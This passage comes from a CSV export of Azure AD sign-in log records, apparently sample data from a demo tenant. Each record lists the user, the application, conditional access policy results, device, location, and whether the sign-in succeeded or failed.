'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 13:59,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",4d916265-6489-4572-bed8-5861122d1600,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,4d916265-6489-4572-bed8-5861122d1600,SigninLogs,Sucess,50.6406517,5.572050095
+666,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,34:30.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2c52b82e-8f80-4fed-88d5-4ec394a5bb4d,Microsoft.aadiam,Microsoft.aadiam,,Yaniv Shasha,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:34,"{'operatingSystem': 'Windows 10', 'deviceId': '186ef690-f143-49cd-9d77-bcb2bdc8f0ef', 'browser': 'Chrome 80.0.3987', 'displayName': 'YANIVSH-SU', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",2631c49b-42a9-4c42-b072-b6f3a0ad4b00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},Yaniv Shasha,4daf13e6-b859-4673-a823-01853ff28370,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,2631c49b-42a9-4c42-b072-b6f3a0ad4b00,SigninLogs,Sucess,32.32146072,34.85319901
+667,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:24.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0d8924b1-eb67-4037-99b8-1f3d4e6c2724,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",99101c3d-fa2a-42b6-a9d2-fbb9d1af1400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,99101c3d-fa2a-42b6-a9d2-fbb9d1af1400,SigninLogs,Sucess,36.6404686,-78.26995087
+668,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:36.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,50058,None,The application tried to perform a silent sign in and the user could not be silently signed in. The application needs to start an interactive flow giving users an option to sign in. Contact app owner.,0,bd16479f-8045-0000-5683-424995b0e98c,Microsoft.aadiam,Microsoft.aadiam,,ee9ea8b3-5b09-4c36-8739-24856720b373,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,[],notApplied,09/04/2020 14:01,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",724252ea-eeaa-47d5-808a-7afeaaf81400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],"{'errorCode': 50058, 'failureReason': 'The application tried to perform a silent sign in and the user could not be silently signed in. The application needs to start an interactive flow giving users an option to sign in. Contact app owner.'}",ee9ea8b3-5b09-4c36-8739-24856720b373,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,724252ea-eeaa-47d5-808a-7afeaaf81400,SigninLogs,Failed,33.7984581,-84.38828278
+669,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:47.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,bd16479f-8045-0000-5683-424995b0e98c,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 14:01,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",724252ea-eeaa-47d5-808a-7afeb3fa1400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,724252ea-eeaa-47d5-808a-7afeb3fa1400,SigninLogs,Sucess,33.7984581,-84.38828278
+670,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:02.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,40f1ee85-8494-4fa8-82b6-1ad652d998de,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 14:02,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",2b6dd05c-6ab3-47f4-b023-40d0ae661300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,2b6dd05c-6ab3-47f4-b023-40d0ae661300,SigninLogs,Sucess,33.7984581,-84.38828278
+671,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,48:04.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3b8be8a8-ef28-453d-b76d-658753bb1e07,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 13:48,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",1dc1286f-da3f-4a48-9584-fc8fa6291400,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,1dc1286f-da3f-4a48-9584-fc8fa6291400,SigninLogs,Sucess,50.6406517,5.572050095
+672,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,53:44.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,66e06b60-076f-4a4d-8fc5-d8e54b2caa06,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 13:53,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Chrome 80.0.3987', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",414b4bc7-d5ca-4f1d-b1c1-8c28032e4f00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,414b4bc7-d5ca-4f1d-b1c1-8c28032e4f00,SigninLogs,Sucess,32.32146072,34.85319901
+673,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:00.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5ef98704-2b5d-459c-92c8-6f37e0c71c74,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 14:02,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",a9f59943-bd83-455b-86cd-4cf1d4fe1400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 